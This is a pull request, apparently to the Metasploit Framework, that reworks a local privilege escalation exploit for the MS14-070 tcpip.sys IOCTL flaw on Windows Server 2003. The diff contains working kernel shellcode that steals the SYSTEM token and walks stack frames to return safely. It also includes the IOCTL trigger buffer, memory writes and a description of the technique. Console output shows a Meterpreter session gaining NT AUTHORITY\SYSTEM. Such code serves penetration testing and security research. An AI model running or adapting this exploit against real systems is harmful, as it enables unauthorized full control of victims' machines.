### PR TITLE
MS14-070 Changes

### DIFF
--- a/lib/msf/core/exploit/local/windows_kernel.rb
+++ b/lib/msf/core/exploit/local/windows_kernel.rb
@@ -116,10 +116,12 @@ module Exploit::Local::WindowsKernel
   #   original token to so it can be restored later.
   # @param arch [String] The architecture to return shellcode for. If this is nil,
   #   the arch will be guessed from the target and then module information.
+  # @param append_ret [Boolean] Append a ret instruction for use when being called
+  #   in place of HaliQuerySystemInformation.
   # @return [String] The token stealing shellcode.
   # @raise [ArgumentError] If the arch is incompatible.
   #
-  def token_stealing_shellcode(target, backup_token = nil, arch = nil)
+  def token_stealing_shellcode(target, backup_token = nil, arch = nil, append_ret = true)
     arch = target.opts['Arch'] if arch.nil? && target && target.opts['Arch']
     if arch.nil? && module_info['Arch']
       arch = module_info['Arch']
@@ -144,15 +146,17 @@ module Exploit::Local::WindowsKernel
         tokenstealing << "\x89\x1d" + [backup_token].pack('V')                       # mov dword ptr ds:backup_token, ebx   # Optionaly write a copy of the token to the address provided
       end
       tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
-      tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+      tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax, 88h                       | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
       tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
-      tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
-      tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
+      tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================|
+      tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx, dword ptr [eax+0C8h]    # Retrieves TOKEN and stores on EDX
       tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
       tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
       tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
       tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
-      tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
+      if append_ret
+        tokenstealing << "\xc2\x10"                                                  # ret 10h                          # Away from the kernel!
+      end
     else
       # if this is reached the issue most likely exists in the exploit module
       print_error('Unsupported arch for token stealing shellcode')

--- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
+++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Local
     major, minor, build, revision, branch = file_version(file_path)
     vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
 
-    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && "#{revision}" < 5440)
+    if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440)
       return Exploit::CheckCode::Vulnerable
     end
 

--- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
+++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
@@ -38,7 +38,14 @@ class Metasploit3 < Msf::Exploit::Local
         },
       'Targets'       =>
         [
-          ['Windows Server 2003 SP2', {} ]
+          ['Windows Server 2003 SP2',
+            {
+              '_KPROCESS' => "\x38",
+              '_TOKEN' => "\xd8",
+              '_UPID' => "\x94",
+              '_APLINKS' => "\x98"
+            }
+          ]
         ],
       'References'    =>
         [
@@ -76,19 +83,6 @@ class Metasploit3 < Msf::Exploit::Local
     return Exploit::CheckCode::Safe
   end
 
-  def create_proc
-    windir = session.sys.config.getenv('windir')
-    cmd = "#{windir}\\System32\\notepad.exe"
-    # run hidden
-    begin
-      proc = session.sys.process.execute(cmd, nil, 'Hidden' => true)
-    rescue Rex::Post::Meterpreter::RequestError
-      return nil
-    end
-
-    proc.pid
-  end
-
   def exploit
     if is_system?
       fail_with(Exploit::Failure::None, 'Session is already elevated')
@@ -102,18 +96,6 @@ class Metasploit3 < Msf::Exploit::Local
 
     unless check == Exploit::CheckCode::Vulnerable
       fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
-    end
-
-    p = payload.encoded
-    new_pid = create_proc
-
-    unless new_pid
-      fail_with(Failure::Unknown, 'Unable to create a new process.')
-    end
-
-    print_status("Injecting #{p.length} bytes into #{new_pid} memory and executing it...")
-    unless execute_shellcode(p, nil, new_pid)
-      fail_with(Failure::Unknown, 'Error while executing the payload')
     end
 
     handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
@@ -132,33 +114,26 @@ class Metasploit3 < Msf::Exploit::Local
 
     buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
 
-    sc = "\x60"                       # save registers
-    sc << "\x64\xA1\x24\x01\x00\x00"  # mov eax, [fs:0x124]
-    sc << "\x8B\x40\x38"              # mov eax, [eax+0x38]
-    sc << "\x50"                      # push eax
-    sc << "\xBB\x04\x00\x00\x00"      # mov ebx, 0x4
-    sc << "\x8B\x80\x98\x00\x00\x00"  # mov eax, [eax+0x98]
-    sc << "\x2D\x98\x00\x00\x00"      # sub eax, 0x98
-    sc << "\x39\x98\x94\x00\x00\x00"  # cmp [eax+0x94], ebx
-    sc << "\x75\xED"                  # jne 0x10
-    sc << "\x8B\xB8\xD8\x00\x00\x00"  # mov edi, [eax+0xd8]
-    sc << "\x83\xE7\xF8"              # and edi, 0xfffffff8
-    sc << "\x58"                      # pop eax
-    sc << "\xBB"                      # mov ebx, new_pid
-    sc << [new_pid].pack('V')
-    sc << "\x8B\x80\x98\x00\x00\x00"  # mov eax, [eax+0x98]
-    sc << "\x2D\x98\x00\x00\x00"      # sub eax, 0x98
-    sc << "\x39\x98\x94\x00\x00\x00"  # cmp [eax+0x94], ebx
-    sc << "\x75\xED"                  # jne 0x32
-    sc << "\x89\xB8\xD8\x00\x00\x00"  # mov [eax+0xd8], edi
-    sc << "\x61"                      # restore registers
-    sc << "\xBA\x39\xFF\xA2\xBA"      # mov edx, 0xbaa2ff39
-    sc << "\xB9\x00\x00\x00\x00"      # mov ecx, 0x0
-    sc << "\xB8\x3B\x00\x00\x00"      # mov eax, 0x3b
-    sc << "\x8E\xE0"                  # mov fs, eax
-    sc << "\x0F\x35\x00"              # sysexit
+    sc  = token_stealing_shellcode(target)[0..-3]
+    # move up the stack frames looking for nt!KiSystemServicePostCall
+    sc << "\x31\xc9"                     # xor ecx, ecx
+    sc << "\x89\xeb"                     # mov ebx, ebp
+    # count_frames
+    sc << "\x41"                         # inc ecx
+    sc << "\xf7\x43\x04\x00\x00\x00\x80" # test dword [ebx+4], 0x80000000
+    sc << "\x8b\x1b"                     # mov ebx, dword [ebx]
+    sc << "\x75\xf4"                     # jne short count_frames
+    sc << "\x49"                         # dec ecx
+    # loop_frames
+    sc << "\x49"                         # dec ecx
+    sc << "\x89\xec"                     # mov esp, ebp
+    sc << "\x5d"                         # pop ebp
+    sc << "\x83\xf9\x00"                 # cmp ecx, 0
+    sc << "\x75\xf7"                     # jne loop_frames
+    sc << "\x31\xc0"                     # xor eax, eax
+    sc << "\xc3"
 
-    this_proc.memory.write(0x28, "\x87\xFF\xFF\x38")
+    this_proc.memory.write(0x28, "\x87\xff\xff\x38")
     this_proc.memory.write(0x38, "\x00\x00")
     this_proc.memory.write(0x1100, buf)
     this_proc.memory.write(0x2b, "\x00\x00")
@@ -166,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     print_status("Triggering the vulnerability...")
     session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
-    session.railgun.kernel32.CloseHandle(handle)
+    #session.railgun.kernel32.CloseHandle(handle) # CloseHandle will never return, so skip it
 
     print_status("Checking privileges after exploitation...")
 
@@ -175,8 +150,9 @@ class Metasploit3 < Msf::Exploit::Local
     end
 
     print_good("Exploitation successful!")
-
+    unless execute_shellcode(payload.encoded, nil, this_proc.pid)
+      fail_with(Failure::Unknown, 'Error while executing the payload')
+    end
   end
 
 end
-

--- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
+++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Local
 
     buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
 
-    sc  = token_stealing_shellcode(target)[0..-3]
+    sc  = token_stealing_shellcode(target, nil, nil, false)
     # move up the stack frames looking for nt!KiSystemServicePostCall
     sc << "\x31\xc9"                     # xor ecx, ecx
     sc << "\x89\xeb"                     # mov ebx, ebp

--- a/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
+++ b/modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Local
     sc << "\x83\xf9\x00"                 # cmp ecx, 0
     sc << "\x75\xf7"                     # jne loop_frames
     sc << "\x31\xc0"                     # xor eax, eax
-    sc << "\xc3"
+    sc << "\xc3"                         # ret
 
     this_proc.memory.write(0x28, "\x87\xff\xff\x38")
     this_proc.memory.write(0x38, "\x00\x00")


### PR DESCRIPTION
I reworked the module a bit to:
 1. Use the ```token_stealing_shellcode``` method provided by the mixin
 1. Not spawn a new notepad process (can either inject into a SYSTEM process or spawn a new one after elevation)
 1. Execute the shellcode after checking if the module has succeeded or not
 1. Fixed the issue where the host process would die and the module would hang

The new shellcode that gets executed after the token stealing shellcode walks up the stack looking for ```nt!KiSystemServicePostCall```. It calculates the address to that by finding the first return address into userland, and assumes that ```nt!KiSystemServicePostCall``` is the last address before that. This removes the necessity to have a hard coded address to be used by ```sysexit```, as well as seems to keep the host process alive.

Test successfully on Windows Server 2003 tcpip.sys file version: 5.2.3790.4573 branch: 45.

Example output:
```
msf-git (S:0 J:1) exploit(ms14_070_tcpip_ioctl) > 
[*] [2015.02.05-09:32:48] Sending stage (770048 bytes) to 192.168.90.142

[*] Meterpreter session 10 opened (192.168.90.1:4444 -> 192.168.90.142:1031) at 2015-02-05 09:32:49 -0500
msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > rexploit
[*] Reloading module...

[*] [2015.02.05-09:32:54] tcpip.sys file version: 5.2.3790.4573 branch: 45
[*] [2015.02.05-09:32:54] Storing the shellcode in memory...
[*] [2015.02.05-09:32:55] Triggering the vulnerability...
[*] [2015.02.05-09:32:55] Checking privileges after exploitation...
[+] [2015.02.05-09:32:55] Exploitation successful!
[*] [2015.02.05-09:32:56] Creating the thread to execute in 0x1000000 (pid=2992)
[*] [2015.02.05-09:32:56] Sending stage (770048 bytes) to 192.168.90.142
msf-git (S:1 J:1) exploit(ms14_070_tcpip_ioctl) > [*] Meterpreter session 11 opened (192.168.90.1:4444 -> 192.168.90.142:1032) at 2015-02-05 09:32:57 -0500

msf-git (S:2 J:1) exploit(ms14_070_tcpip_ioctl) > 
msf-git (S:2 J:1) exploit(ms14_070_tcpip_ioctl) > sessions -i 10
[*] Starting interaction with 10...

meterpreter > sysinfo
Computer        : TEST-HTVDPU1HIG
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > background 
[*] Backgrounding session 10...
msf-git (S:2 J:1) exploit(ms14_070_tcpip_ioctl) > sessions -i 11
[*] Starting interaction with 11...

meterpreter > sysinfo
Computer        : TEST-HTVDPU1HIG
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```

Let me know what you think and hopefully we can get this module landed!